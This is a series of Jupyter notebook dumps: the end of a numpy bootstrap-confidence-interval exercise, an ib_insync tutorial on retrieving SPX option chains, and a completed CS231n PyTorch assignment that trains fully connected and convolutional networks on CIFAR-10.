100. Compute bootstrapped 95% confidence intervals for the mean of a 1D array X (i.e., resample the elements of an array with replacement N times, compute the mean of each sample, and then compute percentiles over the means). (★★★)
###Code
# Author: Jessica B. Hamrick
X = np.random.randn(100) # random 1D array
N = 1000 # number of bootstrap samples
idx = np.random.randint(0, X.size, (N, X.size))
means = X[idx].mean(axis=1)
confint = np.percentile(means, [2.5, 97.5])
print(confint)
###Output
_____no_output_____ |
notebooks/.ipynb_checkpoints/option_chain-checkpoint.ipynb | ###Markdown
Option chains=======
###Code
from ib_insync import *
util.startLoop()
ib = IB()
ib.connect('127.0.0.1', 7497, clientId=12)
###Output
_____no_output_____
###Markdown
Suppose we want to find the options on the SPX, with the following conditions:* Use the next three monthly expiries;* Use strike prices within +- 20 dollar of the current SPX value;* Use strike prices that are a multitude of 5 dollar. To get the current market value, first create a contract for the underlyer (the S&P 500 index):
###Code
spx = Index('SPX', 'CBOE')
ib.qualifyContracts(spx)
###Output
_____no_output_____
###Markdown
To avoid issues with market data permissions, we'll use delayed data:
###Code
ib.reqMarketDataType(4)
###Output
_____no_output_____
###Markdown
Then get the ticker. Requesting a ticker can take up to 11 seconds.
###Code
[ticker] = ib.reqTickers(spx)
ticker
###Output
_____no_output_____
###Markdown
Take the current market value of the ticker:
###Code
spxValue = ticker.marketPrice()
spxValue
###Output
_____no_output_____
###Markdown
The following request fetches a list of option chains:
###Code
chains = ib.reqSecDefOptParams(spx.symbol, '', spx.secType, spx.conId)
util.df(chains)
###Output
_____no_output_____
###Markdown
These are four option chains that differ in ``exchange`` and ``tradingClass``. The latter is 'SPX' for the monthly and 'SPXW' for the weekly options. Note that the weekly expiries are disjoint from the monthly ones, so when interested in the weekly options the monthly options can be added as well.In this case we're only interested in the monthly options trading on SMART:
###Code
chain = next(c for c in chains if c.tradingClass == 'SPX' and c.exchange == 'SMART')
chain
###Output
_____no_output_____
###Markdown
What we have here is the full matrix of expirations x strikes. From this we can build all the option contracts that meet our conditions:
###Code
strikes = [strike for strike in chain.strikes
if strike % 5 == 0
and spxValue - 20 < strike < spxValue + 20]
expirations = sorted(exp for exp in chain.expirations)[:3]
rights = ['P', 'C']
contracts = [Option('SPX', expiration, strike, right, 'SMART', tradingClass='SPX')
for right in rights
for expiration in expirations
for strike in strikes]
contracts = ib.qualifyContracts(*contracts)
len(contracts)
contracts[0]
###Output
_____no_output_____
###Markdown
Now to get the market data for all options in one go:
###Code
tickers = ib.reqTickers(*contracts)
tickers[0]
###Output
_____no_output_____
###Markdown
The option greeks are available from the ``modelGreeks`` attribute, and if there is a bid, ask resp. last price available also from ``bidGreeks``, ``askGreeks`` and ``lastGreeks``. For streaming ticks the greek values will be kept up to date to the current market situation.
###Code
ib.disconnect()
###Output
_____no_output_____ |
Lectures/CS231n/Assignments/assignment2-solved/.ipynb_checkpoints/PyTorch-checkpoint.ipynb | ###Markdown
What's this PyTorch business?You've written a lot of code in this assignment to provide a whole host of neural network functionality. Dropout, Batch Norm, and 2D convolutions are some of the workhorses of deep learning in computer vision. You've also worked hard to make your code efficient and vectorized.For the last part of this assignment, though, we're going to leave behind your beautiful codebase and instead migrate to one of two popular deep learning frameworks: in this instance, PyTorch (or TensorFlow, if you switch over to that notebook). What is PyTorch?PyTorch is a system for executing dynamic computational graphs over Tensor objects that behave similarly as numpy ndarray. It comes with a powerful automatic differentiation engine that removes the need for manual back-propagation. Why?* Our code will now run on GPUs! Much faster training. When using a framework like PyTorch or TensorFlow you can harness the power of the GPU for your own custom neural network architectures without having to write CUDA code directly (which is beyond the scope of this class).* We want you to be ready to use one of these frameworks for your project so you can experiment more efficiently than if you were writing every feature you want to use by hand. * We want you to stand on the shoulders of giants! TensorFlow and PyTorch are both excellent frameworks that will make your lives a lot easier, and now that you understand their guts, you are free to use them :) * We want you to be exposed to the sort of deep learning code you might run into in academia or industry. PyTorch versionsThis notebook assumes that you are using **PyTorch version 0.4**. Prior to this version, Tensors had to be wrapped in Variable objects to be used in autograd; however Variables have now been deprecated. In addition 0.4 also separates a Tensor's datatype from its device, and uses numpy-style factories for constructing Tensors rather than directly invoking Tensor constructors. How will I learn PyTorch?Justin Johnson has made an excellent [tutorial](https://github.com/jcjohnson/pytorch-examples) for PyTorch. You can also find the detailed [API doc](http://pytorch.org/docs/stable/index.html) here. If you have other questions that are not addressed by the API docs, the [PyTorch forum](https://discuss.pytorch.org/) is a much better place to ask than StackOverflow. Table of ContentsThis assignment has 5 parts. You will learn PyTorch on different levels of abstractions, which will help you understand it better and prepare you for the final project. 1. Preparation: we will use CIFAR-10 dataset.2. Barebones PyTorch: we will work directly with the lowest-level PyTorch Tensors. 3. PyTorch Module API: we will use `nn.Module` to define arbitrary neural network architecture. 4. PyTorch Sequential API: we will use `nn.Sequential` to define a linear feed-forward network very conveniently. 5. CIFAR-10 open-ended challenge: please implement your own network to get as high accuracy as possible on CIFAR-10. You can experiment with any layer, optimizer, hyperparameters or other advanced features. Here is a table of comparison:| API | Flexibility | Convenience ||---------------|-------------|-------------|| Barebone | High | Low || `nn.Module` | High | Medium || `nn.Sequential` | Low | High | Part I. PreparationFirst, we load the CIFAR-10 dataset. This might take a couple minutes the first time you do it, but the files should stay cached after that.In previous parts of the assignment we had to write our own code to download the CIFAR-10 dataset, preprocess it, and iterate through it in minibatches; PyTorch provides convenient tools to automate this process for us.
###Code
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.utils.data import sampler
import torchvision.datasets as dset
import torchvision.transforms as T
import numpy as np
NUM_TRAIN = 49000
# The torchvision.transforms package provides tools for preprocessing data
# and for performing data augmentation; here we set up a transform to
# preprocess the data by subtracting the mean RGB value and dividing by the
# standard deviation of each RGB value; we've hardcoded the mean and std.
transform = T.Compose([
T.ToTensor(),
T.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])
# We set up a Dataset object for each split (train / val / test); Datasets load
# training examples one at a time, so we wrap each Dataset in a DataLoader which
# iterates through the Dataset and forms minibatches. We divide the CIFAR-10
# training set into train and val sets by passing a Sampler object to the
# DataLoader telling how it should sample from the underlying Dataset.
cifar10_train = dset.CIFAR10('./cs231n/datasets', train=True, download=True,
transform=transform)
loader_train = DataLoader(cifar10_train, batch_size=64,
sampler=sampler.SubsetRandomSampler(range(NUM_TRAIN)))
cifar10_val = dset.CIFAR10('./cs231n/datasets', train=True, download=True,
transform=transform)
loader_val = DataLoader(cifar10_val, batch_size=64,
sampler=sampler.SubsetRandomSampler(range(NUM_TRAIN, 50000)))
cifar10_test = dset.CIFAR10('./cs231n/datasets', train=False, download=True,
transform=transform)
loader_test = DataLoader(cifar10_test, batch_size=64)
###Output
Files already downloaded and verified
Files already downloaded and verified
Files already downloaded and verified
###Markdown
You have an option to **use GPU by setting the flag to True below**. It is not necessary to use GPU for this assignment. Note that if your computer does not have CUDA enabled, `torch.cuda.is_available()` will return False and this notebook will fallback to CPU mode.The global variables `dtype` and `device` will control the data types throughout this assignment.
###Code
USE_GPU = True
dtype = torch.float32 # we will be using float throughout this tutorial
if USE_GPU and torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device('cpu')
# Constant to control how frequently we print train loss
print_every = 100
print('using device:', device)
###Output
using device: cuda
###Markdown
Part II. Barebones PyTorchPyTorch ships with high-level APIs to help us define model architectures conveniently, which we will cover in Part II of this tutorial. In this section, we will start with the barebone PyTorch elements to understand the autograd engine better. After this exercise, you will come to appreciate the high-level model API more.We will start with a simple fully-connected ReLU network with two hidden layers and no biases for CIFAR classification. This implementation computes the forward pass using operations on PyTorch Tensors, and uses PyTorch autograd to compute gradients. It is important that you understand every line, because you will write a harder version after the example.When we create a PyTorch Tensor with `requires_grad=True`, then operations involving that Tensor will not just compute values; they will also build up a computational graph in the background, allowing us to easily backpropagate through the graph to compute gradients of some Tensors with respect to a downstream loss. Concretely if x is a Tensor with `x.requires_grad == True` then after backpropagation `x.grad` will be another Tensor holding the gradient of x with respect to the scalar loss at the end. PyTorch Tensors: Flatten FunctionA PyTorch Tensor is conceptionally similar to a numpy array: it is an n-dimensional grid of numbers, and like numpy PyTorch provides many functions to efficiently operate on Tensors. As a simple example, we provide a `flatten` function below which reshapes image data for use in a fully-connected neural network.Recall that image data is typically stored in a Tensor of shape N x C x H x W, where:* N is the number of datapoints* C is the number of channels* H is the height of the intermediate feature map in pixels* W is the height of the intermediate feature map in pixelsThis is the right way to represent the data when we are doing something like a 2D convolution, that needs spatial understanding of where the intermediate features are relative to each other. When we use fully connected affine layers to process the image, however, we want each datapoint to be represented by a single vector -- it's no longer useful to segregate the different channels, rows, and columns of the data. So, we use a "flatten" operation to collapse the `C x H x W` values per representation into a single long vector. The flatten function below first reads in the N, C, H, and W values from a given batch of data, and then returns a "view" of that data. "View" is analogous to numpy's "reshape" method: it reshapes x's dimensions to be N x ??, where ?? is allowed to be anything (in this case, it will be C x H x W, but we don't need to specify that explicitly).
###Code
def flatten(x):
N = x.shape[0] # read in N, C, H, W
return x.view(N, -1) # "flatten" the C * H * W values into a single vector per image
def test_flatten():
x = torch.arange(12).view(2, 1, 3, 2)
print('Before flattening: ', x)
print('After flattening: ', flatten(x))
test_flatten()
###Output
Before flattening: tensor([[[[ 0., 1.],
[ 2., 3.],
[ 4., 5.]]],
[[[ 6., 7.],
[ 8., 9.],
[ 10., 11.]]]])
After flattening: tensor([[ 0., 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10., 11.]])
###Markdown
Barebones PyTorch: Two-Layer NetworkHere we define a function `two_layer_fc` which performs the forward pass of a two-layer fully-connected ReLU network on a batch of image data. After defining the forward pass we check that it doesn't crash and that it produces outputs of the right shape by running zeros through the network.You don't have to write any code here, but it's important that you read and understand the implementation.
###Code
import torch.nn.functional as F # useful stateless functions
def two_layer_fc(x, params):
"""
A fully-connected neural networks; the architecture is:
NN is fully connected -> ReLU -> fully connected layer.
Note that this function only defines the forward pass;
PyTorch will take care of the backward pass for us.
The input to the network will be a minibatch of data, of shape
(N, d1, ..., dM) where d1 * ... * dM = D. The hidden layer will have H units,
and the output layer will produce scores for C classes.
Inputs:
- x: A PyTorch Tensor of shape (N, d1, ..., dM) giving a minibatch of
input data.
- params: A list [w1, w2] of PyTorch Tensors giving weights for the network;
w1 has shape (D, H) and w2 has shape (H, C).
Returns:
- scores: A PyTorch Tensor of shape (N, C) giving classification scores for
the input data x.
"""
# first we flatten the image
x = flatten(x) # shape: [batch_size, C x H x W]
w1, w2 = params
# Forward pass: compute predicted y using operations on Tensors. Since w1 and
# w2 have requires_grad=True, operations involving these Tensors will cause
# PyTorch to build a computational graph, allowing automatic computation of
# gradients. Since we are no longer implementing the backward pass by hand we
# don't need to keep references to intermediate values.
# you can also use `.clamp(min=0)`, equivalent to F.relu()
x = F.relu(x.mm(w1))
x = x.mm(w2)
return x
def two_layer_fc_test():
hidden_layer_size = 42
x = torch.zeros((64, 50), dtype=dtype) # minibatch size 64, feature dimension 50
w1 = torch.zeros((50, hidden_layer_size), dtype=dtype)
w2 = torch.zeros((hidden_layer_size, 10), dtype=dtype)
scores = two_layer_fc(x, [w1, w2])
print(scores.size()) # you should see [64, 10]
two_layer_fc_test()
###Output
torch.Size([64, 10])
###Markdown
Barebones PyTorch: Three-Layer ConvNetHere you will complete the implementation of the function `three_layer_convnet`, which will perform the forward pass of a three-layer convolutional network. Like above, we can immediately test our implementation by passing zeros through the network. The network should have the following architecture:1. A convolutional layer (with bias) with `channel_1` filters, each with shape `KW1 x KH1`, and zero-padding of two2. ReLU nonlinearity3. A convolutional layer (with bias) with `channel_2` filters, each with shape `KW2 x KH2`, and zero-padding of one4. ReLU nonlinearity5. Fully-connected layer with bias, producing scores for C classes.**HINT**: For convolutions: http://pytorch.org/docs/stable/nn.htmltorch.nn.functional.conv2d; pay attention to the shapes of convolutional filters!
###Code
def three_layer_convnet(x, params):
"""
Performs the forward pass of a three-layer convolutional network with the
architecture defined above.
Inputs:
- x: A PyTorch Tensor of shape (N, 3, H, W) giving a minibatch of images
- params: A list of PyTorch Tensors giving the weights and biases for the
network; should contain the following:
- conv_w1: PyTorch Tensor of shape (channel_1, 3, KH1, KW1) giving weights
for the first convolutional layer
- conv_b1: PyTorch Tensor of shape (channel_1,) giving biases for the first
convolutional layer
- conv_w2: PyTorch Tensor of shape (channel_2, channel_1, KH2, KW2) giving
weights for the second convolutional layer
- conv_b2: PyTorch Tensor of shape (channel_2,) giving biases for the second
convolutional layer
- fc_w: PyTorch Tensor giving weights for the fully-connected layer. Can you
figure out what the shape should be?
- fc_b: PyTorch Tensor giving biases for the fully-connected layer. Can you
figure out what the shape should be?
Returns:
- scores: PyTorch Tensor of shape (N, C) giving classification scores for x
"""
conv_w1, conv_b1, conv_w2, conv_b2, fc_w, fc_b = params
scores = None
################################################################################
# TODO: Implement the forward pass for the three-layer ConvNet. #
################################################################################
scores = F.conv2d(x, conv_w1, conv_b1, padding=2)
scores = F.relu(scores)
scores = F.conv2d(scores, conv_w2, conv_b2, padding=1)
scores = F.relu(scores)
scores = flatten(scores).mm(fc_w) + fc_b
################################################################################
# END OF YOUR CODE #
################################################################################
return scores
###Output
_____no_output_____
###Markdown
After defining the forward pass of the ConvNet above, run the following cell to test your implementation.When you run this function, scores should have shape (64, 10).
###Code
def three_layer_convnet_test():
x = torch.zeros((64, 3, 32, 32), dtype=dtype) # minibatch size 64, image size [3, 32, 32]
conv_w1 = torch.zeros((6, 3, 5, 5), dtype=dtype) # [out_channel, in_channel, kernel_H, kernel_W]
conv_b1 = torch.zeros((6,)) # out_channel
conv_w2 = torch.zeros((9, 6, 3, 3), dtype=dtype) # [out_channel, in_channel, kernel_H, kernel_W]
conv_b2 = torch.zeros((9,)) # out_channel
# you must calculate the shape of the tensor after two conv layers, before the fully-connected layer
fc_w = torch.zeros((9 * 32 * 32, 10))
fc_b = torch.zeros(10)
scores = three_layer_convnet(x, [conv_w1, conv_b1, conv_w2, conv_b2, fc_w, fc_b])
print(scores.size()) # you should see [64, 10]
three_layer_convnet_test()
###Output
torch.Size([64, 10])
###Markdown
Barebones PyTorch: InitializationLet's write a couple utility methods to initialize the weight matrices for our models.- `random_weight(shape)` initializes a weight tensor with the Kaiming normalization method.- `zero_weight(shape)` initializes a weight tensor with all zeros. Useful for instantiating bias parameters.The `random_weight` function uses the Kaiming normal initialization method, described in:He et al, *Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification*, ICCV 2015, https://arxiv.org/abs/1502.01852
###Code
def random_weight(shape):
"""
Create random Tensors for weights; setting requires_grad=True means that we
want to compute gradients for these Tensors during the backward pass.
We use Kaiming normalization: sqrt(2 / fan_in)
"""
if len(shape) == 2: # FC weight
fan_in = shape[0]
else:
fan_in = np.prod(shape[1:]) # conv weight [out_channel, in_channel, kH, kW]
# randn is standard normal distribution generator.
w = torch.randn(shape, device=device, dtype=dtype) * np.sqrt(2. / fan_in)
w.requires_grad = True
return w
def zero_weight(shape):
return torch.zeros(shape, device=device, dtype=dtype, requires_grad=True)
# create a weight of shape [3 x 5]
# you should see the type `torch.cuda.FloatTensor` if you use GPU.
# Otherwise it should be `torch.FloatTensor`
random_weight((3, 5))
###Output
_____no_output_____
###Markdown
Barebones PyTorch: Check AccuracyWhen training the model we will use the following function to check the accuracy of our model on the training or validation sets.When checking accuracy we don't need to compute any gradients; as a result we don't need PyTorch to build a computational graph for us when we compute scores. To prevent a graph from being built we scope our computation under a `torch.no_grad()` context manager.
###Code
def check_accuracy_part2(loader, model_fn, params):
"""
Check the accuracy of a classification model.
Inputs:
- loader: A DataLoader for the data split we want to check
- model_fn: A function that performs the forward pass of the model,
with the signature scores = model_fn(x, params)
- params: List of PyTorch Tensors giving parameters of the model
Returns: Nothing, but prints the accuracy of the model
"""
split = 'val' if loader.dataset.train else 'test'
print('Checking accuracy on the %s set' % split)
num_correct, num_samples = 0, 0
with torch.no_grad():
for x, y in loader:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.int64)
scores = model_fn(x, params)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
acc = float(num_correct) / num_samples
print('Got %d / %d correct (%.2f%%)' % (num_correct, num_samples, 100 * acc))
###Output
_____no_output_____
###Markdown
BareBones PyTorch: Training LoopWe can now set up a basic training loop to train our network. We will train the model using stochastic gradient descent without momentum. We will use `torch.functional.cross_entropy` to compute the loss; you can [read about it here](http://pytorch.org/docs/stable/nn.htmlcross-entropy).The training loop takes as input the neural network function, a list of initialized parameters (`[w1, w2]` in our example), and learning rate.
###Code
def train_part2(model_fn, params, learning_rate):
"""
Train a model on CIFAR-10.
Inputs:
- model_fn: A Python function that performs the forward pass of the model.
It should have the signature scores = model_fn(x, params) where x is a
PyTorch Tensor of image data, params is a list of PyTorch Tensors giving
model weights, and scores is a PyTorch Tensor of shape (N, C) giving
scores for the elements in x.
- params: List of PyTorch Tensors giving weights for the model
- learning_rate: Python scalar giving the learning rate to use for SGD
Returns: Nothing
"""
for t, (x, y) in enumerate(loader_train):
# Move the data to the proper device (GPU or CPU)
x = x.to(device=device, dtype=dtype)
y = y.to(device=device, dtype=torch.long)
# Forward pass: compute scores and loss
scores = model_fn(x, params)
loss = F.cross_entropy(scores, y)
# Backward pass: PyTorch figures out which Tensors in the computational
# graph has requires_grad=True and uses backpropagation to compute the
# gradient of the loss with respect to these Tensors, and stores the
# gradients in the .grad attribute of each Tensor.
loss.backward()
# Update parameters. We don't want to backpropagate through the
# parameter updates, so we scope the updates under a torch.no_grad()
# context manager to prevent a computational graph from being built.
with torch.no_grad():
for w in params:
w -= learning_rate * w.grad
# Manually zero the gradients after running the backward pass
w.grad.zero_()
if t % print_every == 0:
print('Iteration %d, loss = %.4f' % (t, loss.item()))
check_accuracy_part2(loader_val, model_fn, params)
print()
print('After final iteration:')
check_accuracy_part2(loader_val, model_fn, params)
###Output
_____no_output_____
###Markdown
BareBones PyTorch: Train a Two-Layer NetworkNow we are ready to run the training loop. We need to explicitly allocate tensors for the fully connected weights, `w1` and `w2`. Each minibatch of CIFAR has 64 examples, so the tensor shape is `[64, 3, 32, 32]`. After flattening, `x` shape should be `[64, 3 * 32 * 32]`. This will be the size of the first dimension of `w1`. The second dimension of `w1` is the hidden layer size, which will also be the first dimension of `w2`. Finally, the output of the network is a 10-dimensional vector that represents the probability distribution over 10 classes. You don't need to tune any hyperparameters but you should see accuracies above 40% after training for one epoch.
###Code
hidden_layer_size = 4000
learning_rate = 1e-2
w1 = random_weight((3 * 32 * 32, hidden_layer_size))
w2 = random_weight((hidden_layer_size, 10))
train_part2(two_layer_fc, [w1, w2], learning_rate)
###Output
Iteration 0, loss = 3.2505
Checking accuracy on the val set
Got 151 / 1000 correct (15.10%)
Iteration 100, loss = 2.1541
Checking accuracy on the val set
Got 312 / 1000 correct (31.20%)
Iteration 200, loss = 2.1399
Checking accuracy on the val set
Got 366 / 1000 correct (36.60%)
Iteration 300, loss = 2.1403
Checking accuracy on the val set
Got 361 / 1000 correct (36.10%)
Iteration 400, loss = 1.8222
Checking accuracy on the val set
Got 388 / 1000 correct (38.80%)
Iteration 500, loss = 1.6920
Checking accuracy on the val set
Got 421 / 1000 correct (42.10%)
Iteration 600, loss = 1.6406
Checking accuracy on the val set
Got 443 / 1000 correct (44.30%)
Iteration 700, loss = 2.0537
Checking accuracy on the val set
Got 406 / 1000 correct (40.60%)
After final iteration:
Checking accuracy on the val set
Got 419 / 1000 correct (41.90%)
###Markdown
BareBones PyTorch: Training a ConvNetIn the below you should use the functions defined above to train a three-layer convolutional network on CIFAR. The network should have the following architecture:1. Convolutional layer (with bias) with 32 5x5 filters, with zero-padding of 22. ReLU3. Convolutional layer (with bias) with 16 3x3 filters, with zero-padding of 14. ReLU5. Fully-connected layer (with bias) to compute scores for 10 classesYou should initialize your weight matrices using the `random_weight` function defined above, and you should initialize your bias vectors using the `zero_weight` function above.You don't need to tune any hyperparameters, but if everything works correctly you should achieve an accuracy above 42% after one epoch.
###Code
learning_rate = 3e-3
channel_1 = 32
channel_2 = 16
conv_w1 = None
conv_b1 = None
conv_w2 = None
conv_b2 = None
fc_w = None
fc_b = None
################################################################################
# TODO: Initialize the parameters of a three-layer ConvNet. #
################################################################################
conv_w1 = random_weight((32, 3, 5, 5))
conv_b1 = zero_weight((32,))
conv_w2 = random_weight((16, 32, 3, 3))
conv_b2 = zero_weight((16,))
fc_w = random_weight((16*32*32, 10))
fc_b = zero_weight((10,))
################################################################################
# END OF YOUR CODE #
################################################################################
params = [conv_w1, conv_b1, conv_w2, conv_b2, fc_w, fc_b]
train_part2(three_layer_convnet, params, learning_rate)
###Output
Iteration 0, loss = 2.8836
Checking accuracy on the val set
Got 119 / 1000 correct (11.90%)
Iteration 100, loss = 1.8933
Checking accuracy on the val set
Got 367 / 1000 correct (36.70%)
Iteration 200, loss = 1.5477
Checking accuracy on the val set
Got 407 / 1000 correct (40.70%)
Iteration 300, loss = 1.7207
Checking accuracy on the val set
Got 427 / 1000 correct (42.70%)
Iteration 400, loss = 1.6164
Checking accuracy on the val set
Got 425 / 1000 correct (42.50%)
Iteration 500, loss = 1.6501
Checking accuracy on the val set
Got 454 / 1000 correct (45.40%)
Iteration 600, loss = 1.4735
Checking accuracy on the val set
Got 453 / 1000 correct (45.30%)
Iteration 700, loss = 1.4796
Checking accuracy on the val set
Got 471 / 1000 correct (47.10%)
After final iteration:
Checking accuracy on the val set
Got 489 / 1000 correct (48.90%)
###Markdown
Part III. PyTorch Module APIBarebone PyTorch requires that we track all the parameter tensors by hand. This is fine for small networks with a few tensors, but it would be extremely inconvenient and error-prone to track tens or hundreds of tensors in larger networks.PyTorch provides the `nn.Module` API for you to define arbitrary network architectures, while tracking every learnable parameters for you. In Part II, we implemented SGD ourselves. PyTorch also provides the `torch.optim` package that implements all the common optimizers, such as RMSProp, Adagrad, and Adam. It even supports approximate second-order methods like L-BFGS! You can refer to the [doc](http://pytorch.org/docs/master/optim.html) for the exact specifications of each optimizer.To use the Module API, follow the steps below:1. Subclass `nn.Module`. Give your network class an intuitive name like `TwoLayerFC`. 2. In the constructor `__init__()`, define all the layers you need as class attributes. Layer objects like `nn.Linear` and `nn.Conv2d` are themselves `nn.Module` subclasses and contain learnable parameters, so that you don't have to instantiate the raw tensors yourself. `nn.Module` will track these internal parameters for you. Refer to the [doc](http://pytorch.org/docs/master/nn.html) to learn more about the dozens of builtin layers. **Warning**: don't forget to call the `super().__init__()` first!3. In the `forward()` method, define the *connectivity* of your network. You should use the attributes defined in `__init__` as function calls that take tensor as input and output the "transformed" tensor. Do *not* create any new layers with learnable parameters in `forward()`! All of them must be declared upfront in `__init__`. After you define your Module subclass, you can instantiate it as an object and call it just like the NN forward function in part II. Module API: Two-Layer NetworkHere is a concrete example of a 2-layer fully connected network:
###Code
class TwoLayerFC(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super().__init__()
# assign layer objects to class attributes
self.fc1 = nn.Linear(input_size, hidden_size)
# nn.init package contains convenient initialization methods
# http://pytorch.org/docs/master/nn.html#torch-nn-init
nn.init.kaiming_normal_(self.fc1.weight)
self.fc2 = nn.Linear(hidden_size, num_classes)
nn.init.kaiming_normal_(self.fc2.weight)
def forward(self, x):
# forward always defines connectivity
x = flatten(x)
scores = self.fc2(F.relu(self.fc1(x)))
return scores
def test_TwoLayerFC():
input_size = 50
x = torch.zeros((64, input_size), dtype=dtype) # minibatch size 64, feature dimension 50
model = TwoLayerFC(input_size, 42, 10)
scores = model(x)
print(scores.size()) # you should see [64, 10]
test_TwoLayerFC()
###Output
torch.Size([64, 10])
###Markdown
Module API: Three-Layer ConvNetIt's your turn to implement a 3-layer ConvNet followed by a fully connected layer. The network architecture should be the same as in Part II:1. Convolutional layer with `channel_1` 5x5 filters with zero-padding of 22. ReLU3. Convolutional layer with `channel_2` 3x3 filters with zero-padding of 14. ReLU5. Fully-connected layer to `num_classes` classesYou should initialize the weight matrices of the model using the Kaiming normal initialization method.**HINT**: http://pytorch.org/docs/stable/nn.htmlconv2dAfter you implement the three-layer ConvNet, the `test_ThreeLayerConvNet` function will run your implementation; it should print `(64, 10)` for the shape of the output scores.
###Code
class ThreeLayerConvNet(nn.Module):
def __init__(self, in_channel, channel_1, channel_2, num_classes):
super().__init__()
########################################################################
# TODO: Set up the layers you need for a three-layer ConvNet with the #
# architecture defined above. #
########################################################################
self.conv1 = nn.Conv2d(in_channels=in_channel, out_channels=channel_1,
kernel_size=(5, 5), padding=2, bias=True)
nn.init.kaiming_normal_(self.conv1.weight)
nn.init.constant_(self.conv1.bias, 0)
self.conv2 = nn.Conv2d(in_channels=channel_1, out_channels=channel_2,
kernel_size=(3, 3), padding=1, bias=True)
nn.init.kaiming_normal_(self.conv2.weight)
nn.init.constant_(self.conv2.bias, 0)
self.fc = nn.Linear(in_features = channel_2 * 32 *32,
out_features = num_classes, bias = True)
nn.init.kaiming_normal_(self.fc.weight)
nn.init.constant_(self.fc.bias, 0)
########################################################################
# END OF YOUR CODE #
########################################################################
def forward(self, x):
scores = None
########################################################################
# TODO: Implement the forward function for a 3-layer ConvNet. you #
# should use the layers you defined in __init__ and specify the #
# connectivity of those layers in forward() #
########################################################################
scores = F.relu(self.conv1(x))
scores = F.relu(self.conv2(scores))
scores = self.fc(flatten(scores))
########################################################################
# END OF YOUR CODE #
########################################################################
return scores
def test_ThreeLayerConvNet():
x = torch.zeros((64, 3, 32, 32), dtype=dtype) # minibatch size 64, image size [3, 32, 32]
model = ThreeLayerConvNet(in_channel=3, channel_1=12, channel_2=8, num_classes=10)
scores = model(x)
print(scores.size()) # you should see [64, 10]
test_ThreeLayerConvNet()
###Output
torch.Size([64, 10])
###Markdown
Module API: Check AccuracyGiven the validation or test set, we can check the classification accuracy of a neural network. This version is slightly different from the one in part II. You don't manually pass in the parameters anymore.
###Code
def check_accuracy_part34(loader, model):
if loader.dataset.train:
print('Checking accuracy on validation set')
else:
print('Checking accuracy on test set')
num_correct = 0
num_samples = 0
model.eval() # set model to evaluation mode
with torch.no_grad():
for x, y in loader:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
acc = float(num_correct) / num_samples
print('got %d / %d correct (%.2f)' % (num_correct, num_samples, 100 * acc))
###Output
_____no_output_____
###Markdown
Module API: Training LoopWe also use a slightly different training loop. Rather than updating the values of the weights ourselves, we use an Optimizer object from the `torch.optim` package, which abstract the notion of an optimization algorithm and provides implementations of most of the algorithms commonly used to optimize neural networks.
###Code
def train_part34(model, optimizer, epochs=1):
"""
Train a model on CIFAR-10 using the PyTorch Module API.
Inputs:
- model: A PyTorch Module giving the model to train.
- optimizer: An Optimizer object we will use to train the model
- epochs: (Optional) A Python integer giving the number of epochs to train for
Returns: Nothing, but prints model accuracies during training.
"""
model = model.to(device=device) # move the model parameters to CPU/GPU
for e in range(epochs):
#print(f'Epoch number {e}')
for t, (x, y) in enumerate(loader_train):
model.train() # put model to training mode
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.long)
scores = model(x)
loss = F.cross_entropy(scores, y)
# Zero out all of the gradients for the variables which the optimizer
# will update.
optimizer.zero_grad()
# This is the backwards pass: compute the gradient of the loss with
# respect to each parameter of the model.
loss.backward()
# Actually update the parameters of the model using the gradients
# computed by the backwards pass.
optimizer.step()
if t % print_every == 0:
print('Iteration %d, loss = %.4f' % (t, loss.item()))
check_accuracy_part34(loader_val, model)
print()
###Output
_____no_output_____
###Markdown
Module API: Train a Two-Layer NetworkNow we are ready to run the training loop. In contrast to part II, we don't explicitly allocate parameter tensors anymore.Simply pass the input size, hidden layer size, and number of classes (i.e. output size) to the constructor of `TwoLayerFC`. You also need to define an optimizer that tracks all the learnable parameters inside `TwoLayerFC`.You don't need to tune any hyperparameters, but you should see model accuracies above 40% after training for one epoch.
###Code
hidden_layer_size = 4000
learning_rate = 1e-2
model = TwoLayerFC(3 * 32 * 32, hidden_layer_size, 10)
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
train_part34(model, optimizer)
###Output
Iteration 0, loss = 3.0983
Checking accuracy on validation set
got 130 / 1000 correct (13.00)
Iteration 700, loss = 1.7910
Checking accuracy on validation set
got 443 / 1000 correct (44.30)
###Markdown
Module API: Train a Three-Layer ConvNetYou should now use the Module API to train a three-layer ConvNet on CIFAR. This should look very similar to training the two-layer network! You don't need to tune any hyperparameters, but you should achieve above above 45% after training for one epoch.You should train the model using stochastic gradient descent without momentum.
###Code
learning_rate = 3e-3
channel_1 = 32
channel_2 = 16
model = None
optimizer = None
################################################################################
# TODO: Instantiate your ThreeLayerConvNet model and a corresponding optimizer #
################################################################################
model = ThreeLayerConvNet(3, channel_1, channel_2, 10)
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
################################################################################
# END OF YOUR CODE
################################################################################
train_part34(model, optimizer)
###Output
Iteration 0, loss = 2.8415
Checking accuracy on validation set
got 128 / 1000 correct (12.80)
Iteration 700, loss = 1.4418
Checking accuracy on validation set
got 482 / 1000 correct (48.20)
###Markdown
